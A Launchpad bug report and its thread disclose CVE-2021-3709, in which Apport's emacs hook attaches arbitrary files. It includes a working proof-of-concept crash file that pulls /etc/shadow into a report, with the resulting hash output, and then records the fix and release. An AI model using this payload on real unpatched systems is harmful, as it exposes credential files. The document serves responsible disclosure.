Ubuntu
apport package

Arbitrary file read in general hook (ubuntu.py)

Bug #1934308 reported by mal
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Apport
Fix Released
Critical
Unassigned
Apport 2.21.0
apport (Ubuntu)
Fix Released
Critical
Unassigned

Bug Description

While reviewing Apport's general hooks it was found that the hook `apport/general-hooks/ubuntu.py` includes user controlled files when handling `emacs`-related reports:

if report['Package'] in ['emacs22', 'emacs23', 'emacs-snapshot', 'xemacs21']:
    # emacs add-on packages trigger byte compilation, which might fail
    # we are very interested in reading the compilation log to determine
    # where to reassign this report to
    regex = r'^!! Byte-compilation for x?emacs\S+ failed!'
    if attachment in report and re.search(regex, log_file, re.MULTILINE):
        for line in log_file.split('\n'):
            m = re.search(r'^!! and attach the file (\S+)', line) # [0]
            if m:
                path = m.group(1)
                apport.hookutils.attach_file_if_exists(report, path) # [1]

After using a regular expression to extract the file to attach [0], the extracted file subsequently gets attached to the report file [1].

With automatic crash reporting enabled the following PoC (tested on 20.04/21.04 Desktop) includes the file `/etc/shadow` in the respective report file:

cat << EOF > /var/crash/poc.crash
ProblemType: Package
ExecutablePath: /poc
Package: emacs22
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
EOF

grep -A5 DpkgTerminal /var/crash/poc.crash
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
.etc.shadow:
 root:!:18393:0:99999:7:::
 daemon:*:18375:0:99999:7:::
 bin:*:18375:0:99999:7:::

Best regards!

Revision history for this message
Alex Murray (alexmurray) wrote :

I am unable to reproduce this issue on an up to date Ubuntu 20.04 desktop install - when apport sees the crash file it runs but is not able to access /etc/shadow so this does not get attached - am I missing something? Can you please provide instructions for reproducing this on a fresh Ubuntu 20.04 install?

Changed in apport (Ubuntu):
status: New → Incomplete
Revision history for this message
mal (mallle) wrote :

I just confirmed it on a freshly installed VM (Ubuntu 20.04 Desktop, VMware Workstation 16 Player, Easy Install):
* Update: sudo apt update && sudo apt dist-upgrade
* Enable automatic problem reporting: Settings -> Diagnostics -> Send error reports to Canonical -> Automatic
* Reboot

m@ubuntu:~$ cat << EOF > /var/crash/poc.crash
> ProblemType: Package
> ExecutablePath: /poc
> Package: emacs22
> DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
> !! and attach the file /etc/shadow
> EOF
 m@ubuntu:~$ grep -A5 DpkgTerminal /var/crash/poc.crash
DpkgTerminalLog: !! Byte-compilation for emacs22 failed!
 !! and attach the file /etc/shadow
.etc.shadow:
 root:!:18810:0:99999:7:::
 daemon:*:18667:0:99999:7:::
 bin:*:18667:0:99999:7:::

I hope this helps!

Revision history for this message
mal (mallle) wrote :

To avoid the expiration of this issue, I kindly wanted to ask if you could reproduce the issue?

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

I am able to reproduce the issue, thanks!

Changed in apport (Ubuntu):
status: Incomplete → Confirmed
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

The approach proposed in comment #6 of bug 1933832 would solve this issue also.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

The emacs packages haven't stored the byte compilation results in log files for years, at least since emacs22, so we can just remove this code completely.

Revision history for this message
Steve Beattie (sbeattie) wrote :

Please use CVE-2021-3709 for this issue. Thanks.

Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

I propose we publish these updates on 2021-09-14.

That will allow us to perform the final testing of these updates this week.

Please advise if that public date is problematic.

Thanks!

Revision history for this message
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.11-0ubuntu65.3

---------------
apport (2.20.11-0ubuntu65.3) hirsute-security; urgency=medium

  * SECURITY UPDATE: Arbitrary file read (LP: #1934308)
    - data/general-hooks/ubuntu.py: don't attempt to include emacs
      byte-compilation logs, they haven't been generated by the emacs
      packages in a long time.
    - CVE-2021-3709
  * SECURITY UPDATE: Info disclosure via path traversal (LP: #1933832)
    - apport/hookutils.py, test/test_hookutils.py: detect path traversal
      attacks, and directory symlinks.
    - CVE-2021-3710

 -- Marc Deslauriers <email address hidden> Thu, 26 Aug 2021 10:55:40 -0400

Changed in apport (Ubuntu):
status: Confirmed → Fix Released
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

Updates have now been released:

https://ubuntu.com/security/notices/USN-5077-1

Thanks!

Marc Deslauriers (mdeslaur)
information type: Private Security → Public Security
Benjamin Drung (bdrung)
Changed in apport:
status: New → Fix Released
importance: Undecided → Critical
milestone: none → 2.21.0
Benjamin Drung (bdrung)
Changed in apport (Ubuntu):
importance: Undecided → Critical
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.